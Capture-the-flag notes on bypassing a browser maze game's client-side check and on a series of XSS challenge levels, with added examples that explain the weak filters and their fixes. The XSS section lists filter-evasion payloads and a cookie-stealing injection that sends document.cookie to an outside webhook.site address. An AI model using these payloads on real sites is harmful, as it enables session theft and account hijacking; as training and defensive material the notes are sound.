# JavaScript

## Webpage 'Maze' challenge

* Inspect Element
* Inspector > Script tab (Debugger/Sources in current browsers) > view the game's JavaScript and find the movement rule-check
* Write a replacement function (same name and signature as the original) that skips the rule-check

```
// Same name and signature as the original, so the game keeps calling it
function canMoveTo(destX, destY) {
   var imgData = context.getImageData(destX, destY, 15, 15); // pixel data is still fetched but no longer inspected
   var data = imgData.data;
   var canMove = 1; // 1 means: the rectangle can move
   return canMove; // always allow the move
}
```

* Console tab > paste your function there and press Enter: this redefines the global `canMoveTo`, so the game loop now calls your version
* Now you can move anywhere you want!
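Why the console paste works, as an added example that is not the challenge's own code: the game resolves `canMoveTo` by name on every move, so rebinding the global replaces the check. `WALLS`, the `context` stand-in for the canvas 2D context and the reconstructed body of the original check are constructed assumptions; only the function name and signature come from the page.

```javascript
// Added example (not the challenge's own code): models why pasting a
// replacement canMoveTo() into the console defeats the wall check.
// WALLS, context and the original check body are constructed stand-ins.

// Constructed 4x4 maze, one canvas pixel per cell: 0 = floor (white), 1 = wall (black).
const WALLS = [
  [0, 0, 1, 0],
  [0, 1, 1, 0],
  [0, 0, 0, 0],
  [1, 1, 0, 0],
];

// Stand-in for CanvasRenderingContext2D.getImageData(x, y, w, h):
// RGBA bytes, (0,0,0,255) for wall pixels, (255,255,255,255) for floor.
const context = {
  getImageData(x, y, w, h) {
    const data = new Uint8ClampedArray(w * h * 4);
    for (let j = 0; j < h; j++) {
      for (let i = 0; i < w; i++) {
        const wall = (WALLS[y + j] || [])[x + i] === 1;
        const v = wall ? 0 : 255;
        data.set([v, v, v, 255], (j * w + i) * 4);
      }
    }
    return { data, width: w, height: h };
  },
};

// Original rule-check as the game presumably has it (reconstructed, hypothetical):
// any black pixel in the destination rectangle is a wall, so the move is refused.
globalThis.canMoveTo = function canMoveTo(destX, destY) {
  var data = context.getImageData(destX, destY, 1, 1).data;
  for (var i = 0; i < data.length; i += 4) {
    if (data[i] === 0 && data[i + 1] === 0 && data[i + 2] === 0) {
      return 0;
    }
  }
  return 1; // 1 means: the rectangle can move
};

// The game loop resolves canMoveTo by name on every move, so it picks up
// whatever the global currently points at.
function tryMove(x, y) {
  return globalThis.canMoveTo(x, y) === 1;
}

// What the console paste does: rebind the global name to a version that
// never consults the canvas. A client-side check is not a security boundary.
function disableWallCheck() {
  globalThis.canMoveTo = function canMoveTo(destX, destY) {
    return 1;
  };
}

function demo() {
  const floorBefore = tryMove(0, 0); // floor -> true
  const wallBefore = tryMove(2, 0);  // wall  -> false
  disableWallCheck();
  const wallAfter = tryMove(2, 0);   // same wall, now allowed -> true
  return { floorBefore, wallBefore, wallAfter };
}
```

The same pattern applies to any client-side rule (score checks, form validation, feature flags): anything enforced only in the browser can be redefined from the console, so the server must re-check it.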

## XSS

* **JavaScript** injections (see also: [WebInjections](/04-webapps/03-webapp.md))
* Goal is to pop an alert
* Tricks to avoid filters that:
  * Block 'script' but not 'sCript' (case-sensitive match)
  * Strip \<script> once but not the nested \<sc\<script>ript> (the strip leaves a complete tag behind)
  * Blacklist \<script> but still let an element with an error handler pop (e.g. \<img src=x onerror=…>)
  * Block 'alert' but allow building the word by concatenation inside 'eval'
  * Block 'alert' but allow String.fromCharCode
  * Reflect the input inside the page's existing inline JavaScript (find it with 'Inspect Element'), so closing the string literal injects code
  * Mistake in the code: the page trusts its own request path (index.php/…) and echoes it unencoded
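Why the filter-evasion tricks above work, and the fix, as an added example that is not from the page: `naiveFilter` and `alertFilter` are hypothetical blacklists of the kind these challenges use, and `encodeForHtml` is the context-aware alternative that makes the tricks irrelevant. The payloads are constructed to match the bullets.

```javascript
// Added example (not the page's code): a naive blacklist beside the payloads
// that evade it, and output encoding as the actual fix.

// Weak filter 1: strip the literal tag once, case-sensitively (hypothetical).
function naiveFilter(input) {
  return input.replace('<script>', '').replace('</script>', '');
}

// Weak filter 2: reject any input containing the word "alert" (hypothetical).
function alertFilter(input) {
  return /alert/i.test(input) ? 'blocked' : input;
}

// Fix: do not try to recognise attacks; encode every character that has
// meaning in the HTML text context the value is reflected into.
function encodeForHtml(input) {
  return input.replace(/[&<>"'\/]/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#39;', '/': '&#x2F;',
  })[c]);
}

// Constructed payloads, one per bullet above.
const PAYLOADS = {
  caseChange: '<sCript>alert(1)</sCript>',              // case-sensitive match misses it
  nested: '<sc<script>ript>alert(1)</sc</script>ript>',  // one-pass strip reassembles the tag
  noScriptTag: '<img src=x onerror=alert(1)>',            // no <script> at all, onerror pops
  noAlertWord: '<script>eval("al"+"ert(1)")</script>',    // "alert" never appears literally
  fromCharCode: '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
};

// Build "alert(1)" from char codes, as the fromCharCode trick does.
function alertViaCharCodes() {
  return String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41);
}

function demo() {
  return {
    nestedAfterFilter: naiveFilter(PAYLOADS.nested),     // '<script>alert(1)</script>'
    caseAfterFilter: naiveFilter(PAYLOADS.caseChange),   // unchanged, still executes
    evalPassesAlertFilter: alertFilter(PAYLOADS.noAlertWord) !== 'blocked',
    charCodePassesAlertFilter: alertFilter(PAYLOADS.fromCharCode) !== 'blocked',
    encodedNested: encodeForHtml(PAYLOADS.nested),       // renders as inert text
  };
}
```

`encodeForHtml` is only correct for the HTML text and quoted-attribute contexts; a value reflected inside a script block, a URL, or an unquoted attribute needs the encoding rules of that context instead.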

```
--------------------
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=hack<script>
http://abc.so/index.php?name=hack<script></script>
http://abc.so/index.php?name=hack<h1>TEST</h1>
http://abc.so/index.php?name=hack<script>alert(1)</script>
http://abc.so/index.php?name=hack<script>alert('flag')</script>

--------------------
http://abc.so/index.php?name=hack%3Cscript%3Ealert(%27flag%27)%3C/script%3E
http://abc.so/index.php?name=hack<sc<script>ript>alert('flag')</sc</script>ript>

--------------------
http://abc.so/index.php?name=hack<a href='javascript:alert(1)'>test</a>
http://abc.so/index.php?name=hack<a onmouseover='alert(1)'>test</a>
http://abc.so/index.php?name=hack<img src="zzz.jpg" onerror="alert('flag')"></img>
http://abc.so/index.php?name=hack%3Cimg%20src=%22zzz.jpg%22%20onerror=%27alert(flag)%27%3E%3C/img%3E

--------------------
http://abc.so/index.php?name=hack<script>eval("al"+"ert(flag)")</script> 
http://abc.so/index.php?name=hack<script>eval("al"%2b"ert(flag)")</script>

String.fromCharCode(97,108,101,114,116,40,49,41)  ..."alert(1)"

--------------------
Inspect Element
Inject an alert into the page's existing inline JavaScript (the input lands inside a string literal)!
<div class="row">
<div class="col-lg-12">
<h1>XSS</h1>
 <p>Welcome!
 <script>
 var $a= "hacker";
 </script>
 </p>

http://abc.so/index.php?name=";alert(1);var a="        ..works
http://abc.so/index.php?name=";alert(1);"              ..works
http://abc.so/index.php?name=";alert('flag');"         ..works

--------------------
http://abc.so/index.php?name=";alert('flag');"         ..err (this level single-quotes the string, so " does not close it)
http://abc.so/index.php?name=';alert('flag');'         ..works
http://abc.so/index.php?name=%27;alert(%27flag%27);%27 ..win!

--------------------
Mistake in the code is trusting its own request path: index.php/... is echoed into an attribute without encoding
So we append /somethingelse after index.php to carry the script!
http://abc.so/index.php/hello"><script>alert(1)</script>
http://abc.so/index.php/hello%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://abc.so/index.php/hello"><script>alert('flag')</script>

--------------------
decodeURIComponent (DOM-based: the page decodes location.hash and writes it into the document, so the payload after # never reaches the server)
Current browsers have this case fixed (it used to work often)
http://abc.so/index.php#hacker
http://abc.so/index.php#<script>alert(1)</script>
http://abc.so/index.php#<script>alert('flag')</script>

--------------------
Cookie Grab Flag
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=<script>alert(1)</script>   ..ok
<img src="https://myserver/?c=COOKIE" />                 ..want this cookie
<script>document.write('<img src="https://myserver/?c='+document.cookie+'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="https://myserver/?c='%2bdocument.cookie%2b'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff/?c='%2bdocument.cookie%2b'" />')</script>
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff?c=SECRET%3flag
```
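The "hacker" level above, where the input is reflected inside a JavaScript string literal, as an added example that is not the challenge's own code: `renderPage` and `renderPageSafe` are hypothetical stand-ins for index.php, `runReflectedScripts` is a rough model of how a browser splits and executes script blocks, and the `</script>` break-out payload is a constructed variant of the page's quote-closing payload.

```javascript
// Added example (not the challenge's code): reflecting ?name= into a JS string
// literal, the two ways it breaks, and the fix. renderPage/renderPageSafe are
// hypothetical stand-ins for index.php.

// Vulnerable: the value is pasted straight into a "..."-quoted string.
function renderPage(name) {
  return '<p>Welcome!\n<script>\nvar $a = "' + name + '";\n</script>\n</p>';
}

// Fix: let JSON.stringify escape " \ and control characters, then neutralise
// the sequences the HTML parser acts on before the JS engine ever runs:
// a literal </script> ends the block early and <!-- opens an HTML comment.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')
    .replace(/<!--/g, '<\\!--')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderPageSafe(name) {
  return '<p>Welcome!\n<script>\nvar $a = ' + jsStringLiteral(name) + ';\n</script>\n</p>';
}

// Payload from the page: close the string, run code, reopen the string so the
// statement still parses.
const PAYLOAD_QUOTE = '";alert(1);var a="';
// Constructed variant: break out at the HTML level instead of the JS level.
const PAYLOAD_CLOSE_TAG = '</script><script>alert(2)</script>';

// Rough model of the browser: the HTML parser cuts out each <script> block
// (it does not understand JS, so a </script> inside a string still ends the
// block), then each block is compiled and run on its own; a block that fails
// to parse is skipped and the others still run. alert() is stubbed so the
// calls can be counted in Node.
function runReflectedScripts(html) {
  const calls = [];
  const alert = (x) => calls.push(x);
  for (const m of html.matchAll(/<script>([\s\S]*?)<\/script>/g)) {
    try {
      new Function('alert', m[1])(alert);
    } catch (e) {
      // SyntaxError: this block never executes, as in the browser
    }
  }
  return calls;
}

function demo() {
  return {
    vulnQuote: runReflectedScripts(renderPage(PAYLOAD_QUOTE)),            // [1]
    vulnCloseTag: runReflectedScripts(renderPage(PAYLOAD_CLOSE_TAG)),     // [2]
    safeQuote: runReflectedScripts(renderPageSafe(PAYLOAD_QUOTE)),        // []
    safeCloseTag: runReflectedScripts(renderPageSafe(PAYLOAD_CLOSE_TAG)), // []
  };
}
```

The single-quoted level works the same way with `'` in place of `"`; `jsStringLiteral` covers both because it always emits a double-quoted literal with the inner quotes escaped. For the cookie-grab variant, marking the session cookie `HttpOnly` keeps `document.cookie` from returning it even when the injection itself succeeds.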
